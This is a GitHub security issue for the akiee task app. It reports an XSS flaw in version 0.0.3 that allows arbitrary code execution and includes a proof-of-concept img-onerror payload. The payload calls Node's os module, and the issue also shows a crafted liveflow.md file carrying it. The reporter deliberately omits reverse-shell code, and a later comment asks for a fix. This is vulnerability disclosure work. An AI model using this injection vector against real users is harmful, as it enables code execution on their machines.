akiee [Security] XSS leading to code execution

[Security] XSS leading to code execution

Open thefLink opened this issue 6 years ago • 1 comments

Description A XSS vulnerability exists that leads to arbitrary code execution

Version

Version 0.0.3
Tested on: Linux

To reproduce Steps to reproduce the behavior:

Create a new task
Add this to the details:

<img src="asdf" onerror="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">

See the popup

Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by tricking his victim into opening a crafted liveflow.md that looks like this

# Inbox 
## TODO test_task_1_xxx <img src="asdf" onerror="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">
RANK: 1

In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.

May 17 '18 23:05 thefLink

@rockiger Could you address this with a new release? It looks like this has not been fixed yet.

May 12 '20 13:05 digitalethics

akiee akiee copied to clipboard

[Security] XSS leading to code execution

akiee
akiee copied to clipboard